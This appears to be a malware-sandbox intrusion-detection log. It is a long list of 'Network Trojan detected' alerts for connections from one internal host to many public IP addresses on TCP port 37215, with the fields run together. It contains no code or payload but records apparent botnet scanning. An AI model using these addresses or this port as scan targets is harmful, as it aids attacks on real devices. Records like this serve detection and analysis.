              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235968641.120.156.5137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344338102.145.65.3937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.233425441.78.210.22037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354538186.158.148.3337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356696181.195.83.19337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342308186.206.135.20637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342126156.199.210.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.233957841.169.95.22737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358040102.120.28.12037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341710197.10.65.16237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352072102.127.41.14737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334286223.146.225.21937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345120105.118.54.16437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360722197.42.188.23037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356710181.188.51.8437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339554197.122.184.9337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357356105.193.177.13837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360606105.221.146.23337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358390223.62.129.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358526105.190.120.14237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348202105.56.161.24637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346368186.239.31.18337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334658160.20.153.19337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358786105.25.35.11437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339832160.5.69.21337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346284156.156.58.4737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353132105.61.16.17237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337668186.30.181.21137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353428197.238.142.10537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339140186.245.135.22637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360970186.81.187.16937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341656102.224.179.14737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235366441.195.8.337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349076197.222.176.8637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359446160.171.52.21937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347268186.18.227.17737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360692160.233.180.13937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355824157.36.23.19237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235498241.16.149.4637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343116190.117.85.25237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349724102.219.232.10337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335404156.10.136.22837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342096105.104.128.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355344156.244.177.11037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338796102.23.112.3337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338910181.162.133.4937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344842105.36.238.1837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337604157.250.114.20137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354724197.72.128.20137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336558105.179.203.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2332848186.39.116.2037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337708157.60.40.22237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351078186.111.217.9837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339774197.144.123.21837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334052186.37.114.7337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353392197.214.162.13937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346076160.26.174.16337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349672156.61.159.037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359666186.219.55.237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353272160.232.33.15137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339774105.189.245.6437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350310160.166.25.9637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339736190.222.252.4337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343148102.113.6.23637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360128186.200.205.20337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340310105.189.71.237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344482160.23.71.637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342142197.5.69.15037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345664186.80.154.20237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334844105.198.52.15637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358480156.230.141.10937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356518197.251.39.6837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338770157.208.214.23737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344340102.28.8.1037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346232197.145.149.18637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339934105.128.176.837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335658186.5.198.4837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345902181.140.115.11937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339642156.250.87.10737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342598197.242.122.5237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335434156.160.14.22337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357454105.75.223.3337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348432160.69.197.17237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360482105.241.109.15137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339298181.88.242.10237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358890105.152.215.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351908197.114.114.3137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344220156.134.141.24137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346810181.253.77.20237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349098181.54.4.17037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357804186.222.67.21937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351874102.239.51.8937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339798160.129.13.5937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355564223.191.48.19737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336232105.3.200.7237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333782186.197.183.9037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336786156.128.11.2637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346866181.33.212.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344350186.214.134.13337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343998181.234.8.4737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357518157.65.216.10437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356206102.178.106.4037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342596102.83.51.22937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355562190.1.123.22837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360396157.129.150.24737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.233480841.19.247.11037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354646156.126.98.13337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338022186.155.136.15937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353526186.26.154.12137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333580223.239.211.11137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344200105.175.182.17337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341642186.130.210.4937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352170181.14.82.16737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343568223.211.40.7637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348732105.182.132.8137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360940105.78.212.6137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359102105.141.157.16737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349516102.116.194.24837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348630102.76.15.8637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353568102.84.6.22837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354524223.29.241.11237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336470197.133.63.737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338734197.253.151.3037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351728190.7.122.8237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353802181.126.238.18437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341742105.204.223.1337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338518186.162.115.1237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350092186.218.237.1037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351672156.248.196.3837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344040160.145.200.15537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350718160.118.213.9737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336774105.36.198.19737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333258186.146.169.21237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336978160.85.17.15437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340670197.43.134.7237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343792186.1.24.1537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353436156.71.62.1837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336060190.159.128.5337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336630105.71.38.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333528160.254.132.22037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357574102.181.31.8037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350640156.234.112.4037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335068160.178.83.137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358412181.180.121.9537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352760160.244.162.22437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342654181.82.215.337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344734223.204.132.16837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333282156.95.90.1937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334538186.201.223.13337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357346157.207.146.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338742102.199.138.5037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350922181.159.186.5937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353592105.240.248.3937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2349356197.211.26.23337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334562105.218.159.5437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337656181.218.174.7137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341228157.152.139.19837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340372105.155.140.21537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341580190.134.243.12437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.236070841.141.22.9437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336382186.199.78.24937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342516186.59.68.13137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335036186.69.141.15337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336210157.120.217.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359606186.136.240.13537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355026105.45.20.14637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343860156.188.48.16037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339536160.68.156.12737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2332842156.36.228.3137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340610186.39.232.12437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352980157.250.30.21037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333850105.100.130.17437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235230441.36.109.19037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357862186.37.78.24037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347178105.26.127.22537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346482186.203.119.12937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337262102.191.124.20437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360666186.246.181.11537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351058186.109.217.21137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358302156.33.64.15737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356006186.146.164.11837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.236006841.0.61.637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353058181.83.233.4537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346382156.110.139.17037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359284105.197.92.19637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2334432186.24.95.2237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345210197.195.53.24337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348762186.104.33.21637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358492102.125.184.18037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337538157.21.111.3837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235460841.51.241.20637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340450157.140.9.19337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.234708441.113.201.6937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335052160.178.13.17737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353488105.227.1.14437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354746160.22.198.21037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359738105.210.196.18037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341082157.186.126.20637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342584105.227.56.14037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336656157.67.97.17237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351414181.107.179.9437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347974156.76.92.23837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354380181.113.46.837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339732156.112.214.20537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333494156.124.25.3137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340984181.180.180.2737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357452197.41.143.22137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341768102.124.8.15737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358346197.82.11.25537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360670186.104.15.10037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344098181.222.156.7337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356690160.187.115.16937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335740105.39.38.5037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335892160.196.221.10537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352272186.4.185.20537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2339184223.76.212.18037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348722160.217.166.25237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343728102.179.24.23937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345474156.37.232.14437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358722223.165.125.5337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359292156.218.93.6437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348246102.201.210.24337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343412197.253.135.1337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343444102.202.24.5537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336510181.44.50.11337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358556190.98.206.8937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343244105.178.26.22237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353904105.23.115.6437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353312160.247.49.11437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343892197.202.188.4437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342792105.55.152.21937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359500181.41.57.1037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2359800181.138.150.8837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335056190.92.78.7437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356938223.105.191.11537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345368197.62.222.19837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2340436105.134.92.22837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2353414181.98.18.11737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2355326160.20.76.1537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345384160.231.169.22237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356086160.55.188.2437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356814223.184.133.12537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.233560241.168.56.1037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2335862197.122.206.25037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336592197.115.145.9437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2360346181.199.150.1537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341270105.52.38.16337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2345872102.11.9.18637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2337116156.106.175.13137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2336650160.214.108.2937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348736186.152.155.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356098156.38.202.19537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2350868160.92.157.17437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2338430186.128.102.25437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346612105.81.117.2337215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344356156.108.163.8837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346410190.38.238.21837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356398156.192.95.3637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351788156.172.132.3937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344296156.122.216.837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354596186.63.88.13437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341394160.167.231.2837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2333738186.147.245.9737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343586160.39.2.8537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356718181.114.192.22037215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2344104105.130.30.8737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354756160.91.172.21237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.235585441.236.63.14737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2351606105.170.55.19437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356656105.24.203.17937215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2354206105.108.90.17137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348040105.86.41.17737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341252181.101.55.6737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2343708105.96.59.16637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2356092160.167.8.21237215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2357940186.225.168.25137215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2346374186.127.124.17837215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2358612197.76.161.10737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2352728102.149.182.4637215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2341142102.97.58.3737215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2342230186.113.70.5437215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2347742197.76.149.16537215TCP
              2024-12-13T01:14:16.659855+010028352221A Network Trojan was detected192.168.2.2348008197.90.25.23837215TCP
